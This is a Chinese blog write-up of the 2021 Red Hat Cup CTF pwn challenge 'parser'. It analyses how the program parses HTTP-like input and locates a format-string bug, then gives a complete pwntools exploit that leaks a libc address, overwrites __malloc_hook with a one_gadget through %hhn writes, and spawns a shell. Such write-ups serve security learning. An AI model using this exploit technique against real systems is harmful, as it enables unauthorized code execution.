2021 红帽杯 pwn parser

最新推荐文章于 2021-05-12 16:14:14 发布
最新推荐文章于 2021-05-12 16:14:14 发布
阅读量465 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/116572473
版权

在这里插入图片描述
不出意外的全绿。

在这里插入图片描述

主函数循环读。

在这里插入图片描述
这个地方有个陌生的函数,alloca。
C 语言里有一个 alloca 函数,可以在堆栈上分配一块内存,当前函数退出时,由于系统堆栈指针的调整,这块内存会被自动回收。

alloca 的函数原型是

void * alloca(size_t size);

它的汇编代码很简单,就两句

sub esp,eax
mov rax,rsp

他做的就是在栈上开空间,esp减长度,然后地址放在eax中。

alloca中的算式作用是让你的输入的长度对齐,对齐到16字节,然后保证不会溢出。

dest地址就是我们的alloca的地址,v10地址是栈里面的地址,一会会填一些信息。

下面的函数,分析起来很费劲,所以我们分析一些重要地方。

在这里插入图片描述程序把我们的输入切成了好几块,第一块是空格之前的,strchr函数能够找到空格并且返回地址。

在这里插入图片描述
判断第一个空格之前的东西,必须是上面的字符串中间的一个。

在这里插入图片描述
第二个空格之后的我们要注意第一个字符要求是’/’

在这里插入图片描述回车之后进入while循环。

在这里插入图片描述开始循环判断下面的内容
在这里插入图片描述
分开的时候中间必须有分号,然后我们判断while的条件,\n会结束循环。

在这里插入图片描述有格式化字符串漏洞,但是前面有一些绕过条件,我们需要通过回车后面的绕过,然后最后的部分用我们的payload。

总的来说就是
我们输入一个类似于报文的内容,中间会有两个空格,好多个回车。
第一个空格前要求POST等字符,中间要求第一个字符是’/’,后面是内容,中间冒号隔开,回车隔开,如果条件绕过,两个回车结束循环,利用格式化字符串漏洞。

要注意最后的one_gadget的选择,我们可以看到下面one_gadget选择的时候都有条件。
在这里插入图片描述
比如第一个要求 rsp&0xf = 0 以及rcx = 0 ,明显不符合条件。

在这里插入图片描述第三个one_gadget要求rsp + 0x70 = 0,条件符和,可以使用,就用它。

在这里插入图片描述

exp

from pwn import*

context.log_level = "debug"
context.arch = "amd64"

r = process("./parser")
libc = ELF("./libc-2.27.so")

gdb.attach(r, "b *$rebase(0x137d)")

payload = "POST" + " " + "/Desktop" + " " + "HTTP/1.0\n"
payload += "connection:Keep-Alive\n"
payload += "Content-Length:-1\n\n"

r.sendlineafter(">", payload + "%213$p")
r.recvuntil("0x")
libc_base = int(r.recv(12), 16) - 0x21b97
malloc_hook = libc_base + libc.sym['__malloc_hook']
one_gadget = libc_base + 0x10a45c

print hex(libc_base)
print hex(malloc_hook)
print hex(one_gadget)

byte1 = (one_gadget & 0xff)
byte2 = ((one_gadget >> 8) & 0xff)
byte3 = ((one_gadget >> 16) & 0xff)
byte4 = ((one_gadget >> 24) & 0xff)
byte5 = ((one_gadget >> 32) & 0xff)
byte6 = ((one_gadget >> 40) & 0xff)
#六个字节分开

addr1 = byte1 + 0x100
addr2 = byte2 - byte1 + 0x100
addr3 = byte3 - byte2 + 0x100
addr4 = byte4 - byte3 + 0x100
addr5 = byte5 - byte4 + 0x100
addr6 = byte6 - byte5 + 0x100
#

payload1 = payload
payload1 += "%{}c".format(addr1)+"%110$hhn"
payload1 += "%{}c".format(addr2)+"%111$hhn"
payload1 += "%{}c".format(addr3)+"%112$hhn"
payload1 += "%{}c".format(addr4)+"%113$hhn"
payload1 += "%{}c".format(addr5)+"%114$hhn"
payload1 += "%{}c".format(addr6)+"%115$hhn"+"aa"
#偏移量110有点不大好找,把栈多往下拉一拉
#pwn的这个format用起来很棒

payload1 += p64(malloc_hook)
payload1 += p64(malloc_hook + 1)
payload1 += p64(malloc_hook + 2)
payload1 += p64(malloc_hook + 3)
payload1 += p64(malloc_hook + 4)
payload1 += p64(malloc_hook + 5)
r.sendlineafter(">", payload1)

payload2 = payload + "%100000c"
r.sendlineafter(">", payload2)

r.interactive()

ps:这种对栈环境有要求的,跑exp的时候多试几次。

也可以不用malloc_hook,可以直接修改返回地址。
首先泄露栈地址,计算返回地址,然后修改一些就行。

yongbaoii
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2019年提交的内容:Pwn2Win CTF 2019标志提交
02-24
2019年提交的内容:Pwn2Win CTF 2019标志提交
赣网杯2021_pwn1.rar
12-11
赣网杯2021 pwn1 bin ctf
2021第四届红帽杯网络安全大赛-线上赛Writeup
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
2021红帽杯RE ezRev和file_store题解
abelxu
05-12 881
比赛的时候没做出来,而且坑点也挺多的,赛后复现了一下 0x01 ezRev 比赛的时候更新了题目,原本题目没有字符串提示,分析起来难度较大。题目难点是设置了很多比较坑的比较点需要patch绕过。 1.流程分析 1.输入一个16字节的flag(需要patch长度比较) 2.rand()生成a和b 3.比较a的b次方和b的a次方是否相等,且a>b。应该只有一个解就是 a=4,b=2。(需要patch rand返回值为4,2) 4.计算xtea的key,可以将sleep nop掉,因为前面步骤2,3,
[pwn]堆:realloc_hook控制栈结构达成onegadget
Breeze的博客
12-31 1万+
[pwn]realloc_hook控制栈结构达成onegadget 文章目录[pwn]realloc_hook控制栈结构达成onegadgetchunk extend通过realloc调整栈帧来满足onegadgeteasy_pwn wp chunk extend chunk extend是一种限制比较少的堆利用方式,通常通过off by one或off by null来利用。 chuank ex...
CTF 用户态ptmalloc pwn总结(一)
weixin_41918450的博客
09-24 881
kernel pwn题不准备以总结的方式来写,准备每一道题一篇文章专门分析,有很多题网上都有不少解析,我只在github提供的脚本基础上进行复现和分析(因为能力不够,比赛时kernel pwn做不出,只能赛后复现了) 准备讲一下这三道题,关于强网杯的两道题其实是csaw2010的两道题进行了一些修改。最后会写一篇文章进行专门的总结,关于在这三道题复现过程中的问题以及一些利用技巧。 强网杯2018 ...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
赣网杯2021_pwn2.rar
12-11
赣网杯2021 pwn1 bin ctf
强网杯2022 pwn 赛题解析.docx
12-18
【强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
alloc_netdev()与alloc_etherdev()
热门推荐
RopenYuan的专栏
09-09 1万+
alloc_netdev()函数生成一个net_device结构体,对其成员赋值并返回该结构体的指针。第一个参数是设备私有成员的大小,第二个参数为设备名,第三个参数为net_device的setup()函数指针。setup()函数接收的参数为struct net_device
pwnable.kr alloca -经验总结
qq_43189757的博客
07-17 533
本题思路: 按常规方法想在main函数中溢出时不可能的,alloca分配的空间比能输入的字符大小size一直都要大(一开始我还以为size会有个值能大过alloca函数分配的栈空间,搞了半小时后发现我真是傻的不行),那么就无法从size入手 程序中自带callme中可以getshell的函数,所以我们要控制程序的返回地址到这个函数中 g_canary 模拟栈保护机制中的canary, 在分配的栈空...
一步一步 Pwn RouterOS之ctf题练手
weixin_30394669的博客
08-03 182
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文目的是以一道比较简单的 ctf 的练手,为后面的分析 RouterOs 的 漏洞和写 exploit 打基础。 Seccon CTF quals 2016 的一道题。 题目,idb 文件: https://gitee.com/hac425/blog_data...
pwnable.kr】 alloca
子曰小玖的博客
06-10 714
https://www.anquanke.com/post/id/170288 前言 最近在刷pwnable.kr [Rookiss],题目都好有意思,一其中题alloca虽然分值不高,但分析过程很值得学习。 题目描述 Let me give you a lesson: "How to prevent buffer overflow?" ssh alloca@pwnable....
红帽杯2021_web_部分
ScyLamb的博客
05-10 1258
find_it 首页没发现东西,尝试robots.txt 发现 1ndexx.php 但无法访问 1ndexx.php 尝试继续找信息泄露,最后找到 .1ndexx.php.swp <?php $link = mysql_connect('localhost', 'root'); ?> <html> <head> <title>Hello worldd!</title> <style> body { background-co
HCTF-2018-Official-Writeup
qq_24966613的博客
11-14 4768
HCTF 2018 Official WriteupSimplified Chinese VersionWebWarmupweb签到首先打开然后看F12啦,注释里提示是source.php,php审计,问题出在page=urldecode(_page = urldecode(p​age=urldecode(page); $_page = mb_substr( page,&amp;amp;amp;lt;spancl...
红帽杯
qq_41509200的博客
11-12 172
1 2 3 4 5 6 7 8 9 10 11 12
Snake ---- 2019 红帽杯
Misaka10046的博客
10-28 382
首先打开文件玩玩游戏,玩不动玩不动,这操作实在太顶了,还是正常逆向吧。 发现该游戏是由unity编写的,那么在文件中找到Assembly-CSharp.dll拖进dnspy就能对该游戏框架的反汇编了。(不能直接拖exe。。) 然后看文件的代码就能很清晰的看到游戏调用的函数,有Move,Grow。这种简明扼要的函数,但是我们还是要看游戏的主函数GameObject,看上面的import发现这个函数在Interface这个dll中。 游戏文件中找到这个dll,拖进IDA进行反编译。 根据字符串找到函数
2023 羊城杯 pwn
最新发布
01-02
2023年的羊城杯pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城杯吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值